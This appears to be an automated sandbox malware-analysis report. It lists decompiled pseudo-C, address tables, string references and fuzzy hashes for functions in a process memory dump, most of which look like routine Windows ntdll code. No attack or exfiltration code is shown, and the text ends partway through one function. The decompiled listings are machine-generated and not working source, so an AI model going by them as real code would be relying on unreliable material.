0x019e0f74
0x019e0f79
0x019e0f7d
0x019e0f80
0x019e0f86
0x019e0fab
0x019e0fb5
0x019e0fc6
0x019e0fd1
0x019e0fe3
0x019e0fd3
0x019e0fdc
0x019e0fdc
0x019e0feb
0x019e1009
0x019e1009
0x019e1015
0x019e1027
0x019e1017
0x019e1020
0x019e1020
0x019e102f
0x019e103c
0x019e103c
0x019e1048
0x019e1050
0x019e1050
0x019e1055
0x00000000
0x019e1055
0x019e0f88
0x019e0f9e
0x019e0fa2
0x019e0fa9
0x00000000
0x00000000
0x00000000
0x019e0fa9
0x00000000

Strings

`, xrefs: 019E0F16

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 7e40485766cc077c69d72cd8724c2670516481401ce2960591c4ac8b041e713f
Instruction ID: cec22671a2ed1cd5a23a3df67f2c647c1ff6258cb859f22e5ed3f26d07a69c5c
Opcode Fuzzy Hash: 7e40485766cc077c69d72cd8724c2670516481401ce2960591c4ac8b041e713f
Instruction Fuzzy Hash: 4251A0713043429FD326DF18D888B1BBBE9EBC4715F04492CFA9A97291D770E806C762

Uniqueness

Uniqueness Score: -1.00%

Function 0194F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0194F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01934120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01959830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01959990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E019595D0();
							goto L11;
						} else {
							_t109 = L01934620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0195F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E019595D0();
										L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0194f0d3
0x0194f0d9
0x0194f0e0
0x0194f0e7
0x0194f0f2
0x0194f0f4
0x0194f0f8
0x0194f100
0x0194f108
0x0194f10d
0x0194f115
0x0194f116
0x0194f11f
0x0194f123
0x0194f124
0x0194f12c
0x0194f130
0x0194f134
0x0194f13d
0x0194f144
0x0194f14b
0x0194f152
0x0198bab0
0x0198bab0
0x0194f158
0x0194f158
0x0194f15a
0x0194f160
0x0194f165
0x0194f166
0x0194f16f
0x0194f173
0x0198baa7
0x0198baa7
0x0198baab
0x00000000
0x0194f179
0x0194f18d
0x0194f191
0x0198baa2
0x00000000
0x0194f197
0x0194f19b
0x0194f1a2
0x0194f1a9
0x0194f1af
0x0194f1b2
0x0194f1b6
0x0194f1b9
0x0194f1c4
0x0194f1d8
0x0194f1df
0x0194f1e3
0x0194f1eb
0x0194f1ee
0x0194f1f4
0x0194f20f
0x0198bab7
0x0198babb
0x0198bacc
0x0198bad1
0x0194f215
0x0194f218
0x0194f226
0x0194f22b
0x00000000
0x0194f22b
0x0194f1f6
0x0194f1f6
0x0194f1f9
0x0194f1fb
0x0194f1fb
0x0194f1f4
0x0194f191
0x0194f173
0x0194f152
0x0194f203

Strings

@, xrefs: 0194F124

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 273d0d2a2fd3b07b7297504a68ca0173fd0dd11f5d61ce145debcb59874f33bc
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 15518B711007119FD321DF18C840E6BBBF8FF88714F008929FA9A97690E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01993540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01993540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1a0d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01950BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01993706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0195FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01993540;
						E0195FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0196DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E019A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E019597C0();
					}
					return E0195B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01993971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01993884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0195FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01959650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01993787(_a4,  &_v352, _t80);
						}
					}
					L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E019595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01993552
0x0199355a
0x0199355d
0x01993566
0x01993567
0x0199357e
0x0199358f
0x019935a1
0x019935a5
0x0199366b
0x0199366b
0x0199366d
0x01993672
0x01993679
0x01993685
0x0199368d
0x0199369d
0x019936a7
0x019936b8
0x019936c6
0x019936c7
0x019936dc
0x019936e1
0x019936e7
0x019936e9
0x019936e9
0x01993703
0x01993703
0x019935b5
0x019935c0
0x019935c4
0x00000000
0x00000000
0x019935ca
0x019935d7
0x019935e2
0x019935e6
0x019935e8
0x019935f5
0x019935fa
0x01993603
0x01993604
0x01993609
0x0199360a
0x01993612
0x01993613
0x0199361e
0x01993622
0x01993628
0x0199362f
0x0199362f
0x01993636
0x01993638
0x0199363b
0x01993642
0x01993642
0x01993636
0x01993657
0x01993657
0x0199365c
0x01993662
0x01993669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0199358F

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: dde2f90c5ac269b84e2c00b92a051a343fa6ffa2205d77f55c01c7066100c01e
Instruction ID: cb49d7285c338e2ac1c329381a5dee339d1d8c5e63d925c50b3890054cffe5cb
Opcode Fuzzy Hash: dde2f90c5ac269b84e2c00b92a051a343fa6ffa2205d77f55c01c7066100c01e
Instruction Fuzzy Hash: A44133B1D0152DABDF21DE64CC85F9EB77CAB54714F0045A5AA0DAB240DB309F888FA5

Uniqueness

Uniqueness Score: -1.00%

Function 01993884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01993884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01959650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01934620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01959650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01993893
0x01993896
0x01993899
0x0199389f
0x019938a0
0x019938a4
0x019938a9
0x019938ac
0x019938ad
0x019938ae
0x019938af
0x019938b1
0x019938b4
0x019938bb
0x019938bc
0x019938bd
0x019938c4
0x019938c8
0x019938ca
0x019938ca
0x019938d5
0x0199393e
0x01993940
0x01993942
0x01993952
0x01993954
0x01993961
0x01993961
0x01993967
0x0199396e
0x0199396e
0x01993947
0x0199394c
0x00000000
0x0199394c
0x019938ea
0x019938ee
0x019938f8
0x019938f9
0x019938ff
0x01993900
0x01993902
0x01993903
0x0199390b
0x0199390f
0x01993950
0x00000000
0x01993950
0x01993915
0x0199391d
0x0199391d
0x01993922
0x01993926
0x00000000
0x01993928
0x0199392b
0x0199392b
0x01993935
0x01993937
0x01993937
0x00000000
0x01993935
0x01993926
0x019938f0
0x00000000

Strings

BinaryName, xrefs: 019938B4

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 2917ef47c1295a1684631b2a7c725553d24f815f4d68ea8b08671204cfd99c63
Instruction ID: 3cd1ed91e19a2b6752dfbe33b5063c27543bef76b49980c001f93a44065f2177
Opcode Fuzzy Hash: 2917ef47c1295a1684631b2a7c725553d24f815f4d68ea8b08671204cfd99c63
Instruction Fuzzy Hash: 7B31C07290151AEFEF16DE6DC945E7BBB78FB84B20F018169E919AB250D7309F04C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0194D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0194D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1a0d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01934120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0195B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E019598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E019595D0();
					L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0194d29c
0x0194d2a6
0x0194d2b1
0x0194d2b5
0x0194d2b6
0x0194d2bc
0x0194d2bd
0x0194d2be
0x0194d2bf
0x0194d2c2
0x0194d2c4
0x0194d2cc
0x0194d384
0x0194d34b
0x0194d34f
0x0194d350
0x0194d351
0x0194d35c
0x0194d35c
0x0194d2d6
0x0194d2da
0x0194d2e1
0x0194d361
0x0194d369
0x0194d36d
0x0194d2e3
0x0194d2e3
0x0194d2e3
0x0194d2e5
0x0194d2ed
0x0194d2f5
0x0194d2fa
0x0194d302
0x0194d303
0x0194d30b
0x0194d30f
0x0194d313
0x0194d318
0x0194d31c
0x0194d320
0x0194d379
0x0194d37d
0x00000000
0x00000000
0x0198affe
0x0198b001
0x0198b011
0x00000000
0x0194d322
0x0194d322
0x0194d330
0x0194d337
0x0194d35d
0x0194d339
0x0194d33f
0x0194d38c
0x0194d38c
0x0194d33f
0x0194d349
0x00000000
0x0194d349

Strings

@, xrefs: 0194D303

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e972ae813edd95b059d119a229f5d661bfe60db33294f77d25be295bf699266f
Instruction ID: adcd6d972484887fd00a84dbce4727a5709ce8e8dc8fe65bdd01e56ad4ea2aa3
Opcode Fuzzy Hash: e972ae813edd95b059d119a229f5d661bfe60db33294f77d25be295bf699266f
Instruction Fuzzy Hash: CE3191BA5083059FD721DFA8C980D6BBBE8EBE5658F00092EF99993250D634DD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01921B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01921B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0195BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0195A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0195A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01934620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01921b8f
0x01921b9a
0x01921b9c
0x01921b9e
0x01921ba3
0x01977010
0x01977010
0x00000000
0x01921ba9
0x01921ba9
0x01921bae
0x00000000
0x01921bc5
0x01921bca
0x01921bcf
0x01921bd0
0x01921bd1
0x01921bd2
0x01921bd6
0x01921bdc
0x01921be0
0x01976ffc
0x01977000
0x00000000
0x01977006
0x01977009
0x01977009
0x01921be6
0x01921bec
0x01921c0b
0x01921c0b
0x01921c0c
0x01921c11
0x01921c12
0x01921c15
0x01921c1b
0x01921c1f
0x01921c31
0x01921c33
0x01977026
0x01977026
0x01921c21
0x01921c24
0x01921c24
0x01921bee
0x01921bee
0x01921bf2
0x01921c3a
0x01921bf4
0x01921bf4
0x01921c05
0x01921c05
0x01921c09
0x01921c3e
0x00000000
0x00000000
0x00000000
0x01921c09
0x01921bec
0x01921be0
0x01921bae
0x01921c2e

Strings

WindowsExcludedProcs, xrefs: 01921BC5

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: f628e70a8151847f0140a15d98a2d930e95e3886919b6b4145575800928b0940
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 2A21C57A901639ABDB22DA998844F5FBBADEF81651F154835FE0C9B204D630DD1097E0

Uniqueness

Uniqueness Score: -1.00%

Function 0193F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0193F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0193f71d
0x0193f722
0x0193f726
0x01984770
0x0193f765
0x0193f769
0x0193f769
0x0193f732
0x0198477a
0x00000000
0x0198477a
0x0193f738
0x0193f73a
0x0193f73c
0x0193f73f
0x0193f746
0x0193f778
0x0193f7a9
0x0193f7a9
0x0193f754
0x0193f75a
0x0193f75d
0x0193f75f
0x0193f761
0x0193f76f
0x0193f771
0x0193f771
0x0193f76f
0x0193f763
0x00000000
0x0193f763
0x0193f77d
0x0193f7a3
0x0193f7a5
0x00000000
0x0193f7a5
0x0193f77f
0x0193f782
0x0193f784
0x0193f786
0x00000000
0x00000000
0x00000000
0x0193f788
0x0193f748
0x0193f74d
0x0193f78d
0x0193f793
0x0193f7b7
0x0193f7bc
0x00000000
0x0193f7bc
0x0193f798
0x00000000
0x00000000
0x0193f79d
0x0193f7b0
0x00000000
0x0193f7b0
0x0193f79f
0x00000000
0x0193f74f
0x0193f74f
0x00000000
0x0193f74f

Strings

Actx , xrefs: 0193F73F

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 285470a40d95485ee9487d41941ad2d814749791ba1396a9ec2c5c9a5b1beab8
Instruction ID: 6d41856774f7c3c3048af321204ee172bf431160228d2ae1e93bba0a1a40be09
Opcode Fuzzy Hash: 285470a40d95485ee9487d41941ad2d814749791ba1396a9ec2c5c9a5b1beab8
Instruction Fuzzy Hash: 40119035F04A028BEB274E1D8490B3676D9EBC5765F24493AE56FCB391DA70CC418343

Uniqueness

Uniqueness Score: -1.00%

Function 019C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E019C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x19f0d50);
				E0196D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E019A5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0196DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0196DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0196D130(_t34, _t39, _t40);
			}

0x019c8df1
0x019c8df1
0x019c8df1
0x019c8df1
0x019c8df1
0x019c8df1
0x019c8df3
0x019c8df8
0x019c8dfd
0x019c8e00
0x019c8e0e
0x019c8e2a
0x019c8e36
0x019c8e38
0x019c8e3c
0x019c8e46
0x019c8e46
0x019c8e36
0x019c8e50
0x019c8e56
0x019c8e59
0x019c8e5c
0x019c8e60
0x019c8e67
0x019c8e6d
0x019c8e73
0x019c8e74
0x019c8eb1
0x019c8ebd

Strings

Critical error detected %lx, xrefs: 019C8E21

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 792737f934a5990f76c701d2f790fbef61ddbe3154970b8edae18e1dbaf80d0e
Instruction ID: ef77d71b0574cac25bc820392dd1b9b78c30b647631e53e126c8d6075b948402
Opcode Fuzzy Hash: 792737f934a5990f76c701d2f790fbef61ddbe3154970b8edae18e1dbaf80d0e
Instruction Fuzzy Hash: 04118B71E00348DADF25DFE989057ACBBF8BB44711F20421DD1AC6B282C3341601CF25

Uniqueness

Uniqueness Score: -1.00%

Function 019AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 019AFF60

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 4cd00656e1923760fef88d92895ad807a5c2180d7b817ad067a55d0e3ff88fef
Instruction ID: ccec1f444652b2aa405a8912fc06fdae8b8ed4a886f688e1992307a1541aa4ca
Opcode Fuzzy Hash: 4cd00656e1923760fef88d92895ad807a5c2180d7b817ad067a55d0e3ff88fef
Instruction Fuzzy Hash: 9C11E175A10144EFDB26DB54C948F9C7BB9FF48705F558044E10C671A1C7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019E5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E019E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
